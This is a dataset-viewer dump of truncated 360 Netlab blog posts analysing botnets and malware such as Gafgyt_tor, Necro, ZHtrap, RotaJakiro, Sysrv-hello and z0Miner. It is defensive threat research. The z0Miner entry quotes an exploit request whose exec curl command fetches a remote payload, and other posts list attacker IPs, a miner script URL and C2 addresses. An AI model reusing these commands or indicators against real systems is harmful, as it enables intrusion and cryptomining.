type
stringclasses
1 value
custom_template
null
created_at
stringlengths
24
24
id
stringlengths
24
24
slug
stringlengths
2
124
featured
int64
0
1
updated_at
stringlengths
24
24
visibility
stringclasses
1 value
status
stringclasses
2 values
feature_image
stringclasses
7 values
published_at
stringlengths
24
24
title
stringlengths
2
127
html
stringlengths
4
358k
plaintext
stringlengths
1
82.3k
mobiledoc
stringlengths
99
369k
comment_id
stringlengths
1
24
post
null
2021-03-04T02:48:42.000Z
63873b9a8b1c1e0007f52fab
gafgtyt_tor-and-necro-are-on-the-move-again
0
2021-03-04T13:59:59.000Z
public
published
null
2021-03-04T14:00:00.000Z
Gafgtyt_tor and Necro are on the move again
<!--kg-card-begin: markdown--><h2 id="overview">Overview</h2> <p>Since February 15, 2021, 360Netlab's BotMon system has continuously detected a new variant of the Gafgyt family, which uses Tor for C2 communication to hide the real C2 and encrypts sensitive strings in the samples. This is the first time we found a Gafgy...
Overview Since February 15, 2021, 360Netlab's BotMon system has continuously detected a new variant of the Gafgyt family, which uses Tor for C2 communication to hide the real C2 and encrypts sensitive strings in the samples. This is the first time we found a Gafgyt variant using the Tor mechanism, so we named the var...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## Overview\nSince February 15, 2021, 360Netlab's BotMon system has continuously detected a new variant of the Gafgyt family, which uses Tor for C2 communication to hide the real C2 and encrypts sensitive strings in the samples. This is the first time we f...
60404a8ad0d9b7000712c12f
post
null
2021-03-05T06:14:00.000Z
63873b9a8b1c1e0007f52fac
qnap-nas-users-make-sure-you-check-your-system
0
2022-02-09T07:06:22.000Z
public
published
null
2021-03-05T14:00:00.000Z
QNAP NAS users, make sure you check your system
<!--kg-card-begin: markdown--><h3 id="background">Background</h3> <p>On March 2, 2021, 360Netlab Threat Detection System started to report attacks targeting the widely used QNAP NAS devices via the unauthorized remote command execution vulnerability (CVE-2020-2506 &amp; CVE-2020-2507)<a href="https://www.qnap.com.cn/en...
Background On March 2, 2021, 360Netlab Threat Detection System started to report attacks targeting the widely used QNAP NAS devices via the unauthorized remote command execution vulnerability (CVE-2020-2506 & CVE-2020-2507)[1], upon successful attack, the attacker will gain root privilege on the device and perform ma...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"### Background\nOn March 2, 2021, 360Netlab Threat Detection System started to report attacks targeting the widely used QNAP NAS devices via the unauthorized remote command execution vulnerability (CVE-2020-2506 & CVE-2020-2507)[[1]](https://www.qnap.com.c...
6041cc28d0d9b7000712c2ed
post
null
2021-03-08T13:29:31.000Z
63873b9a8b1c1e0007f52fad
new_threat_zhtrap_botnet_cn
0
2021-03-12T09:32:00.000Z
public
published
null
2021-03-12T08:20:31.000Z
新威胁:ZHtrap僵尸网络分析报告
<!--kg-card-begin: markdown--><h2 id="">版权</h2> <p>版权声明:本文为Netlab原创,依据 <a href="https://creativecommons.org/licenses/by-sa/4.0/">CC BY-SA 4.0</a> 许可证进行授权,转载请附上出处链接及本声明。</p> <h2 id="">概述</h2> <p>从2021年2月28日起,360网络安全研究院的BotMon系统检测到IP(<code>107.189.30.190</code>)在持续传播一批未知ELF样本。经分析,我们确认这些样本隶属于一个新的botnet家族,结合其运行特点,我们将其命名为<c...
版权 版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 从2021年2月28日起,360网络安全研究院的BotMon系统检测到IP(107.189.30.190)在持续传播一批未知ELF样本。经分析,我们确认这些样本隶属于一个新的botnet家族,结合其运行特点,我们将其命名为ZHtrap,本文对其做一分析,文章要点如下: 1. ZHtrap的传播使用了4个Nday漏洞,主要功能依然是DDoS和扫描,同时集成了一些后门功能。 2. Zhtrap能将被感染设备蜜罐化,目的是提高扫描效率。 3. Zhtrap感染受害主机后会禁止运行新的命令,以此...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"\n\n## 版权\n\n版权声明:本文为Netlab原创,依据 [CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0/) 许可证进行授权,转载请附上出处链接及本声明。\n\n## 概述\n\n从2021年2月28日起,360网络安全研究院的BotMon系统检测到IP(```107.189.30.190```)在持续传播一批未知ELF样本。经分析,我们确认这些样本隶属于一个新的botnet家族,结合其运行特点,我们将其命名为```ZHtr...
604626bbd0d9b7000712c331
post
null
2021-03-12T05:13:39.000Z
63873b9a8b1c1e0007f52fae
new_threat_zhtrap_botnet_en
0
2021-03-12T14:09:55.000Z
public
published
null
2021-03-12T14:09:55.000Z
New Threat: ZHtrap botnet implements honeypot to facilitate finding more victims
<!--kg-card-begin: markdown--><h2 id="overview">Overview</h2> <p>In the security community, when people talk about honeypot, by default we would assume this is one of the most used toolkits for security researchers to <code>lure the bad guys</code>. But recently we came across a botnet <strong>uses honeypot to harvest ...
Overview In the security community, when people talk about honeypot, by default we would assume this is one of the most used toolkits for security researchers to lure the bad guys. But recently we came across a botnet uses honeypot to harvest other infected devices, which is quite interesting. From February 28, 2021...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## Overview\nIn the security community, when people talk about honeypot, by default we would assume this is one of the most used toolkits for security researchers to ```lure the bad guys```. But recently we came across a botnet **uses honeypot to harvest o...
604af883d0d9b7000712c6b0
post
null
2021-03-12T10:46:05.000Z
63873b9a8b1c1e0007f52faf
necro-shi-yong-tor-dong-tai-yu-ming-dga-shuang-sha-windows-linux
0
2021-07-08T02:32:19.000Z
public
published
null
2021-03-16T03:13:35.000Z
Necro再次升级,使用Tor+动态域名DGA 双杀Windows&Linux
<!--kg-card-begin: markdown--><h2 id="">版权</h2> <p>版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。</p> <!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h2 id="">概述</h2> <p>自从我们1月份公开<a href="__GHOST_URL__/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/">Necro</a>后不久,它就停止了传播,但从3月2号开始,BotMon系统检测到Ne...
版权 版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 自从我们1月份公开Necro后不久,它就停止了传播,但从3月2号开始,BotMon系统检测到Necro再次开始传播。蜜罐数据显示本次传播所用的漏洞除了之前的TerraMaster RCE(CVE_2020_35665)和Zend RCE (CVE-2021-3007),又加入了两个较新的漏洞Laravel RCE (CVE-2021-3129)和WebLogic RCE (CVE-2020-14882),蜜罐相关捕获记录如下图所示。 通过样本分析我们发现在沉寂一个月之后新版本的Necro有了较...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"##版权\n版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。"}],["markdown",{"markdown":"## 概述\n\n自从我们1月份公开[Necro](__GHOST_URL__/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/)后不久,它就停止了传播,但从3月2号开始,BotMon系统检测到Necro再次开始传播。蜜罐数据显示本次传播所用的漏洞除了之前的TerraMas...
604b466dd0d9b7000712c801
post
null
2021-03-15T03:01:55.000Z
63873b9a8b1c1e0007f52fb0
microsoft-exchange-vulnerability-cve-2021-26855-scan-analysis
0
2022-02-09T07:06:10.000Z
public
published
null
2021-03-25T04:10:58.000Z
Microsoft Exchange 漏洞(CVE-2021-26855)在野扫描分析报告
<!--kg-card-begin: markdown--><h3 id="">背景介绍</h3> <p>2021年3月2号,微软披露了Microsoft Exchange服务器的远程代码执行漏洞<a href="https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/">[1]</a>。</p> <p>2021年3月3号开始,360网络安全研究院Anglerfish蜜罐开始模拟和部署Microsoft Exchange蜜罐插件,很快我们搜集到大量的漏洞检测数据,目前我们已经...
背景介绍 2021年3月2号,微软披露了Microsoft Exchange服务器的远程代码执行漏洞[1]。 2021年3月3号开始,360网络安全研究院Anglerfish蜜罐开始模拟和部署Microsoft Exchange蜜罐插件,很快我们搜集到大量的漏洞检测数据,目前我们已经检测到攻击者植入Webshell,获取邮箱信息,甚至进行XMRig恶意挖矿(http://178.62.226.184/run.ps1)的网络攻击行为。根据挖矿文件路径名特征,我们将该Miner命名为Tripleone。 2021年3月6号开始,ProjectDiscovery和微软CSS-Exchange项目相继披露了漏洞检测脚本[2][3...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"### 背景介绍\n2021年3月2号,微软披露了Microsoft Exchange服务器的远程代码执行漏洞[[1]](https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/)。\n\n2021年3月3号开始,360网络安全研究院Anglerfish蜜罐开始模拟和部署Microsoft Exchange蜜罐插件,很快我们搜集到大量的漏洞检测数据,...
604ece23d0d9b7000712c910
post
null
2021-03-17T04:27:57.000Z
63873b9a8b1c1e0007f52fb1
necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux
0
2021-03-18T15:07:37.000Z
public
published
null
2021-03-18T15:07:00.000Z
Necro upgrades again, using Tor + dynamic domain DGA and aiming at both Windows & Linux
<!--kg-card-begin: markdown--><h2 id="overview">Overview</h2> <p>Back in January, we blogged about a new botnet <a href="__GHOST_URL__/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/">Necro</a> and shortly after our report, it stopped spreading. On March 2nd, we noticed a new variant of Necro showing up on our Bo...
Overview Back in January, we blogged about a new botnet Necro and shortly after our report, it stopped spreading. On March 2nd, we noticed a new variant of Necro showing up on our BotMon tracking radar March 2nd, the BotMon system has detected that Necro has started spreading again, in addition to the previous TerraM...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## Overview\nBack in January, we blogged about a new botnet [Necro](__GHOST_URL__/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/) and shortly after our report, it stopped spreading. On March 2nd, we noticed a new variant of Necro showing up on our B...
6051854dd0d9b7000712cab7
post
null
2021-03-23T09:21:56.000Z
63873b9a8b1c1e0007f52fb2
ssh_stealer_facefish_cn
0
2021-07-08T02:30:07.000Z
public
published
null
2021-05-28T03:53:15.000Z
窃密者Facefish分析报告
<!--kg-card-begin: markdown--><h1 id="">背景介绍</h1> <p>2021年2月,我们捕获了一个通过CWP的Nday漏洞传播的未知ELF样本,简单分析后发现这是一个新botnet家族的样本。它针对Linux x64系统,配置灵活,并且使用了一个基于Diffie–Hellman和Blowfish的私有加密协议。但因为通过合作机构(在中国区有较好网络通信观察视野)验证后发现对应的C2通信命中为0,所以未再深入分析。</p> <p>2021年4月26号,Juniper发布了关于此样本的<a href="https://blogs.juniper.net/en-us/threat-research/l...
背景介绍 2021年2月,我们捕获了一个通过CWP的Nday漏洞传播的未知ELF样本,简单分析后发现这是一个新botnet家族的样本。它针对Linux x64系统,配置灵活,并且使用了一个基于Diffie–Hellman和Blowfish的私有加密协议。但因为通过合作机构(在中国区有较好网络通信观察视野)验证后发现对应的C2通信命中为0,所以未再深入分析。 2021年4月26号,Juniper发布了关于此样本的分析报告,我们注意到报告中忽略了一些重要的技术细节,所以决定将漏掉的细节分享出来。 该家族的入口ELF样本MD5=38fb322cc6d09a6ab85784ede56bc5a7是一个Dropper,它会释放出一个...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"# 背景介绍\n\n2021年2月,我们捕获了一个通过CWP的Nday漏洞传播的未知ELF样本,简单分析后发现这是一个新botnet家族的样本。它针对Linux x64系统,配置灵活,并且使用了一个基于Diffie–Hellman和Blowfish的私有加密协议。但因为通过合作机构(在中国区有较好网络通信观察视野)验证后发现对应的C2通信命中为0,所以未再深入分析。\n\n2021年4月26号,Juniper发布了关于此样本的[**分析报告**](https://blogs.juniper.net/en-u...
6059b334d0d9b7000712cb67
post
null
2021-03-25T07:14:15.000Z
63873b9a8b1c1e0007f52fb3
microsoft-exchange-vulnerability-cve-2021-26855-scan-analysis-3
0
2022-02-09T07:06:01.000Z
public
published
null
2021-03-25T13:00:00.000Z
Microsoft Exchange Vulnerability (CVE-2021-26855) Scan Analysis
<!--kg-card-begin: markdown--><h3 id="background">Background</h3> <p>On March 2, 2021, Microsoft disclosed a remote code execution vulnerability in Microsoft Exchange server<a href="https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/">[1]</a>。</p> <p>We customize...
Background On March 2, 2021, Microsoft disclosed a remote code execution vulnerability in Microsoft Exchange server[1]。 We customized our Anglerfish honeypot to simulate and deploy Microsoft Exchange honeypot plug-in on March 3, and soon we started to see a large amount of related data, so far, we have already seen...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"### Background\nOn March 2, 2021, Microsoft disclosed a remote code execution vulnerability in Microsoft Exchange server[[1]](https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/)。\n\nWe customized ou...
605c3847d0d9b7000712cd1d
post
null
2021-03-25T09:58:44.000Z
63873b9a8b1c1e0007f52fb4
use-dns-data-produce-threat-intelligence-4
0
2021-03-25T11:45:59.000Z
public
draft
null
null
DNSMon: 用DNS数据进行威胁发现(4)
<!--kg-card-begin: markdown--><p><em><strong>----谈DNS基础设施的安全</strong></em></p> <!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>本系列文章的前三篇基本内容虽然侧重点不同,但是实质上比较接近,即都是介绍如何利用DNSMon从DNS数据中发现恶意的程序和恶意网络攻击事件的蛛丝马迹进而拓展还原完整的攻击行为。这篇文章我们换个角度来看一下,仅从DNS数据出发,我们能发现什么有意思的东西。<br> 在本系列<a href="__GHOST_URL__/use-dns-data-produce-...
----谈DNS基础设施的安全 本系列文章的前三篇基本内容虽然侧重点不同,但是实质上比较接近,即都是介绍如何利用DNSMon从DNS数据中发现恶意的程序和恶意网络攻击事件的蛛丝马迹进而拓展还原完整的攻击行为。这篇文章我们换个角度来看一下,仅从DNS数据出发,我们能发现什么有意思的东西。 在本系列第一篇文章中提到,仅靠DNS数据,检测DGA和fastflux是比较高效的,这些都集中在恶意程序的检测层面。如果我们转向DNS系统的基础配置和针对DNS系统的风险发现,则可做的分析就比较多了。当然还是从数据出发,比较直观的可以检测的风险包括DNS配置失当,(递归或权威)DNS面临的DDoS攻击,尤其是前几年特别流行的伪随机子域名攻击等方...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"***----谈DNS基础设施的安全***"}],["markdown",{"markdown":"本系列文章的前三篇基本内容虽然侧重点不同,但是实质上比较接近,即都是介绍如何利用DNSMon从DNS数据中发现恶意的程序和恶意网络攻击事件的蛛丝马迹进而拓展还原完整的攻击行为。这篇文章我们换个角度来看一下,仅从DNS数据出发,我们能发现什么有意思的东西。\n在本系列[第一篇文章](__GHOST_URL__/use-dns-data-produce-threat-intelligence/)中提到,仅靠DNS...
605c5ed4d0d9b7000712cd47
post
null
2021-03-26T09:21:36.000Z
63873b9a8b1c1e0007f52fb5
dnsmon-yong-dnsshu-ju-jin-xing-wei-xie-fa-xian-4
0
2021-03-26T10:38:49.000Z
public
draft
null
null
DNSMon: 用DNS数据进行威胁发现(4)
<p>----用DNS数据发现大规模垃圾邮件的投递</p><p></p><!--kg-card-begin: markdown--><p>从2021年开始DNSMon相继看到以slot0为第一级label的域名,形如下表。并且从3月份开始,这类域名开始出现大规模的DNS请求访问。</p> <pre><code>slot0.aberalunim.xyz slot0.desceet.com slot0.easketh.com slot0.fianinc.com slot0.gleccus.com slot0.healforec.com slot0.hibiscus-solution.com slot0.mindrey.biz slot0...
----用DNS数据发现大规模垃圾邮件的投递 从2021年开始DNSMon相继看到以slot0为第一级label的域名,形如下表。并且从3月份开始,这类域名开始出现大规模的DNS请求访问。 slot0.aberalunim.xyz slot0.desceet.com slot0.easketh.com slot0.fianinc.com slot0.gleccus.com slot0.healforec.com slot0.hibiscus-solution.com slot0.mindrey.biz slot0.rut-hagener.com slot0.tonytonero.com slot0.westlakeserv...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"从2021年开始DNSMon相继看到以slot0为第一级label的域名,形如下表。并且从3月份开始,这类域名开始出现大规模的DNS请求访问。\n```\nslot0.aberalunim.xyz\nslot0.desceet.com\nslot0.easketh.com\nslot0.fianinc.com\nslot0.gleccus.com\nslot0.healforec.com\nslot0.hibiscus-solution.com\nslot0.mindrey.biz\nslot0.rut-h...
605da7a0d0d9b7000712cdaf
post
null
2021-04-18T12:25:23.000Z
63873b9a8b1c1e0007f52fb6
stealth_rotajakiro_backdoor_cn
0
2021-04-29T03:13:38.000Z
public
published
null
2021-04-28T13:29:22.000Z
双头龙(RotaJakiro),一个至少潜伏了3年的后门木马
<!--kg-card-begin: markdown--><h2 id="">版权</h2> <p>版权声明:本文为Netlab原创,依据 <a href="https://creativecommons.org/licenses/by-sa/4.0/">CC BY-SA 4.0</a> 许可证进行授权,转载请附上出处链接及本声明。</p> <h2 id="">概述</h2> <p>2021年3月25日,360 NETLAB的BotMon系统发现一个的VT 0检测的可疑ELF文件(MD5=64f6cfe44ba08b0babdd3904233c4857),它会与4个业务类型截然不同的域名进行通信,端口均为TCP 443(HTTPS...
版权 版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 2021年3月25日,360 NETLAB的BotMon系统发现一个的VT 0检测的可疑ELF文件(MD5=64f6cfe44ba08b0babdd3904233c4857),它会与4个业务类型截然不同的域名进行通信,端口均为TCP 443(HTTPS),但流量却并非TLS/SSL类型,这个异常行为引起了我们的兴趣,进一步分析发现它是一个针对Linux X64系统的后门木马,该家族至少已经存在3年但目前还是0检测。基于该家族使用rotate加密,并且运行后对root/non-root账户有不同的行...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## 版权\n\n版权声明:本文为Netlab原创,依据 [CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0/) 许可证进行授权,转载请附上出处链接及本声明。\n## 概述\n2021年3月25日,360 NETLAB的BotMon系统发现一个的VT 0检测的可疑ELF文件(MD5=64f6cfe44ba08b0babdd3904233c4857),它会与4个业务类型截然不同的域名进行通信,端口均为TCP 443(HTTPS),但流量却...
607c2533d0d9b7000712cdfb
post
null
2021-04-28T02:03:58.000Z
63873b9a8b1c1e0007f52fb7
wei-xie-kuai-xun-z0miner-zheng-zai-li-yong-elasticsearch-he-jenkins-lou-dong-da-si-chuan-bo
0
2021-07-08T02:31:56.000Z
public
published
null
2021-04-28T13:38:20.000Z
威胁快讯:Sysrv-hello再次升级,通过感染网页文件提高传播能力
<!--kg-card-begin: markdown--><h2 id="">版权</h2> <p>版权声明: 本文为Netlab原创,依据 <a href="https://creativecommons.org/licenses/by-sa/4.0/">CC BY-SA 4.0 </a>许可证进行授权,转载请附上出处链接及本声明。</p> <h2 id="">概述</h2> <p>从去年末到现在,挖矿类型的botnet家族一直活跃,除了新家族不断出现,一些老家族也频繁升级,主要是为了提高传播能力和隐蔽性,我们的 BotMon 系统对此多有检测<a href="__GHOST_URL__/rinfojuan-tu-zhong-l...
版权 版权声明: 本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 从去年末到现在,挖矿类型的botnet家族一直活跃,除了新家族不断出现,一些老家族也频繁升级,主要是为了提高传播能力和隐蔽性,我们的 BotMon 系统对此多有检测[rinfo][z0miner]。最新的案例来自Sysrv-hello,本来近期已经有2家安全公司先后分析过该家族的新变种[1][2],但文章刚出来sysrv的作者就在4月20号再次进行升级,增加了感染网页的能力,本文对此做一分析。 新模块a.py和BrowserUpdate.exe 我们知道sysrv能同时感染Linux和...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"##版权\n版权声明: 本文为Netlab原创,依据 [CC BY-SA 4.0 ](https://creativecommons.org/licenses/by-sa/4.0/)许可证进行授权,转载请附上出处链接及本声明。\n##概述\n从去年末到现在,挖矿类型的botnet家族一直活跃,除了新家族不断出现,一些老家族也频繁升级,主要是为了提高传播能力和隐蔽性,我们的 BotMon 系统对此多有检测[[rinfo]](__GHOST_URL__/rinfojuan-tu-zhong-lai-zheng-...
6088c28e3819e5000763355a
post
null
2021-04-28T02:55:09.000Z
63873b9a8b1c1e0007f52fb8
stealth_rotajakiro_backdoor_en
0
2021-04-29T06:11:11.000Z
public
published
null
2021-04-28T13:29:37.000Z
RotaJakiro: A long live secret backdoor with 0 VT detection
<!--kg-card-begin: markdown--><h2 id="overview">Overview</h2> <p>On March 25, 2021, 360 NETLAB's BotMon system flagged a suspiciousELF file (MD5=64f6cfe44ba08b0babdd3904233c4857) with 0 VT detection, the sample communicates with 4 domains on TCP 443 (HTTPS), but the traffic is not of TLS/SSL. A close look at the sampl...
Overview On March 25, 2021, 360 NETLAB's BotMon system flagged a suspiciousELF file (MD5=64f6cfe44ba08b0babdd3904233c4857) with 0 VT detection, the sample communicates with 4 domains on TCP 443 (HTTPS), but the traffic is not of TLS/SSL. A close look at the sample revealed it to be a backdoor targeting Linux X64 syst...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## Overview\nOn March 25, 2021, 360 NETLAB's BotMon system flagged a suspiciousELF file (MD5=64f6cfe44ba08b0babdd3904233c4857) with 0 VT detection, the sample communicates with 4 domains on TCP 443 (HTTPS), but the traffic is not of TLS/SSL. A close look ...
6088ce8d3819e500076335cb
post
null
2021-04-29T00:56:46.000Z
63873b9a8b1c1e0007f52fb9
threat-alert-new-update-from-sysrv-hello-now-infecting-victims-webpages-to-push-malicious-exe-to-end-users
0
2021-07-08T02:30:27.000Z
public
published
null
2021-04-29T10:00:00.000Z
Threat Alert: New update from Sysrv-hello, now infecting victims‘ webpages to push malicious exe to end users
<!--kg-card-begin: markdown--><h2 id="overview">Overview</h2> <p>From the end of last year to now, we have see the uptick of the mining botnet families. While new families have been popping up, some old ones are get frequently updated. Our BotMon system has recently reported about the <a href="__GHOST_URL__/rinfo-is-ma...
Overview From the end of last year to now, we have see the uptick of the mining botnet families. While new families have been popping up, some old ones are get frequently updated. Our BotMon system has recently reported about the [rinfo][z0miner]. And the latest case comes from Sysrv-hello. Two security companies hav...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"##Overview\nFrom the end of last year to now, we have see the uptick of the mining botnet families. While new families have been popping up, some old ones are get frequently updated. Our BotMon system has recently reported about the [[rinfo]](__GHOST_URL__...
608a044e3819e500076338b1
post
null
2021-05-02T09:01:29.000Z
63873b9a8b1c1e0007f52fba
mirai_arora
0
2021-12-29T02:49:55.000Z
public
draft
null
null
Mirai_Aurora攻击事件
<!--kg-card-begin: markdown--><h1 id="">背景</h1> <ul> <li> <p>2021年5月1日,我们蜜罐观察到针对socks5代理协议的流量暴涨平日的5倍之多。经过初步分析这些代理请求的目标地址都是<code>msfepgww33xrdpvwbkshqoyvx5kwtqmc6u7ify6l3t66ggrehjcfycid.onion:12028</code>, 进一步分析发现这个域名是Mirai_Aurora(DDoS僵尸网络)这个僵尸网络的CC。至此可以说明这些暴涨的socks5流量都是来自这个僵尸网络的的bot。因此我们看到的这些针对socks5代理请求的源IP就是Bot的真实IP。...
背景 * 2021年5月1日,我们蜜罐观察到针对socks5代理协议的流量暴涨平日的5倍之多。经过初步分析这些代理请求的目标地址都是msfepgww33xrdpvwbkshqoyvx5kwtqmc6u7ify6l3t66ggrehjcfycid.onion:12028, 进一步分析发现这个域名是Mirai_Aurora(DDoS僵尸网络)这个僵尸网络的CC。至此可以说明这些暴涨的socks5流量都是来自这个僵尸网络的的bot。因此我们看到的这些针对socks5代理请求的源IP就是Bot的真实IP。 * 通过找蜜罐和Fdark数据,我们找到了msfepgww33xrdp...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"# 背景\n- 2021年5月1日,我们蜜罐观察到针对socks5代理协议的流量暴涨平日的5倍之多。经过初步分析这些代理请求的目标地址都是`msfepgww33xrdpvwbkshqoyvx5kwtqmc6u7ify6l3t66ggrehjcfycid.onion:12028`, 进一步分析发现这个域名是Mirai_Aurora(DDoS僵尸网络)这个僵尸网络的CC。至此可以说明这些暴涨的socks5流量都是来自这个僵尸网络的的bot。因此我们看到的这些针对socks5代理请求的源IP就是Bot的真实IP。...
608e6a693819e50007633910
post
null
2021-05-05T08:18:28.000Z
63873b9a8b1c1e0007f52fbb
rotajakiro_vs_oceanlotus_cn
0
2021-05-06T13:29:13.000Z
public
published
null
2021-05-06T13:29:13.000Z
“双头龙”源自海莲花组织?
<!--kg-card-begin: markdown--><p>我们的<a href="__GHOST_URL__/stealth_rotajakiro_backdoor_cn/"><strong>双头龙</strong></a>blog发布后引起了较大反响,除了媒体转载,一些安全同行还纷纷在我们blog下面留言和提问,其中5月4号的一则留言提到双头龙跟海莲花(OceanLotus)样本的C2行为有联系:<br> <img src="__GHOST_URL__/content/images/2021/05/--.png" width="860px" /><br> 留言所提到的<a href="https://www.virust...
我们的双头龙blog发布后引起了较大反响,除了媒体转载,一些安全同行还纷纷在我们blog下面留言和提问,其中5月4号的一则留言提到双头龙跟海莲花(OceanLotus)样本的C2行为有联系: 留言所提到的样本为一个zip打包文件,2016年就已出现。该zip可以解压出多个文件,那个名为Noi dung chi tiet(对应中文详细信息)的Mach-O格式可执行文件即是海莲花样本。对比分析显示该样本确实与双头龙样本存在多个相似之处,所以它们或许可以解开双头龙的身世之谜:它极可能是海莲花的Linux版本。本文主要从2进制代码层面介绍这些相似点。 相似点1:C2会话建立函数 Linux常见的域名解析函数为gethostb...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"我们的[**双头龙**](__GHOST_URL__/stealth_rotajakiro_backdoor_cn/)blog发布后引起了较大反响,除了媒体转载,一些安全同行还纷纷在我们blog下面留言和提问,其中5月4号的一则留言提到双头龙跟海莲花(OceanLotus)样本的C2行为有联系:\n<img src=\"__GHOST_URL__/content/images/2021/05/--.png\" width=\"860px\" />\n留言所提到的[样本](https://www.virus...
609254d43819e500076339e9
post
null
2021-05-06T12:47:40.000Z
63873b9a8b1c1e0007f52fbc
rotajakiro_linux_version_of_oceanlotus
0
2021-05-06T14:07:04.000Z
public
published
null
2021-05-06T13:29:26.000Z
RotaJakiro, the Linux version of the OceanLotus
<!--kg-card-begin: markdown--><p>On Apr 28, we published our <a href="__GHOST_URL__/stealth_rotajakiro_backdoor_en/"><strong>RotaJakiro</strong></a> backdoor blog, at that time, we didn’t have the answer for a very important question, what is this backdoor exactly for? We asked the community for clues and two days ago ...
On Apr 28, we published our RotaJakiro backdoor blog, at that time, we didn’t have the answer for a very important question, what is this backdoor exactly for? We asked the community for clues and two days ago we got a hint, PE(Thanks!) wrote the following comment on our blog post. The sample mentioned in the messag...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"On Apr 28, we published our [**RotaJakiro**](__GHOST_URL__/stealth_rotajakiro_backdoor_en/) backdoor blog, at that time, we didn’t have the answer for a very important question, what is this backdoor exactly for? We asked the community for clues and two da...
6093e56c3819e50007633c8e
post
null
2021-05-08T04:23:18.000Z
63873b9a8b1c1e0007f52fbd
threat-alert-z0miner-is-spreading-quickly-by-exploiting-elasticsearch-and-jenkins-vulnerabilities
0
2021-05-08T04:40:29.000Z
public
published
null
2021-03-08T04:34:00.000Z
Threat Alert: z0Miner Is Spreading quickly by Exploiting ElasticSearch and Jenkins Vulnerabilities
<h2 id="overview"><strong>Overview</strong></h2><p>In recent months, with the huge rise of Bitcoin and Monroe, various mining botnet have kicked into high gear, and our BotMon system detects dozens of mining Botnet attacks pretty much every day, most of them are old families, some just changed their wallets or propagat...
Overview In recent months, with the huge rise of Bitcoin and Monroe, various mining botnet have kicked into high gear, and our BotMon system detects dozens of mining Botnet attacks pretty much every day, most of them are old families, some just changed their wallets or propagation methods, and z0Miner is one of them. ...
{"version":"0.3.1","atoms":[["soft-return","",{}]],"cards":[["image",{"src":"__GHOST_URL__/content/images/2021/03/status-1.png","alt":"","title":"","caption":"z0Miner recent active trends"}],["code",{"code":"POST /{VULN_URI} HTTP/1.1\nHost: {target}:{port}\n\n{...exec(\\\"curl -fsSL http://27.1.1.34:8080/docs/conf.txt ...
609612363819e50007633d06
post
null
2021-05-08T04:38:27.000Z
63873b9a8b1c1e0007f52fbe
wei-xie-kuai-xun-z0miner-zheng-zai-li-yong-elasticsearch-he-jenkins-lou-dong-da-si-chuan-bo-2
0
2021-05-08T04:39:43.000Z
public
published
null
2021-03-07T04:38:00.000Z
威胁快讯:z0Miner 正在利用 ElasticSearch 和 Jenkins 漏洞大肆传播
<h2 id="-"><strong><strong>版权</strong></strong></h2><p>版权声明: 本文为Netlab原创,依据<strong> <a href="https://creativecommons.org/licenses/by-sa/4.0/">CC BY-SA 4.0</a></strong> 许可证进行授权,转载请附上出处链接及本声明。</p><h2 id="--1"><strong>概述</strong></h2><p>最近几个月受比特币、门罗币大涨的刺激,各种挖矿家族纷纷活跃起来,我们的 BotMon 系统每天都能检测到几十上百起的挖矿类 Botnet 攻击事件。根据我们统计,它们多数是...
版权 版权声明: 本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 最近几个月受比特币、门罗币大涨的刺激,各种挖矿家族纷纷活跃起来,我们的 BotMon 系统每天都能检测到几十上百起的挖矿类 Botnet 攻击事件。根据我们统计,它们多数是已经出现过的老家族,有的只是换了新的钱包或者传播方式,z0Miner 就是其中一例。 z0Miner 是去年开始活跃的一个恶意挖矿家族,业界已有公开的分析。z0Miner 最初活跃时,利用 Weblogic 未授权命令执行漏洞进行传播。 近期,360 网络安全研究院 Anglerfish 蜜罐系统监测到 z0Miner 又利用 ...
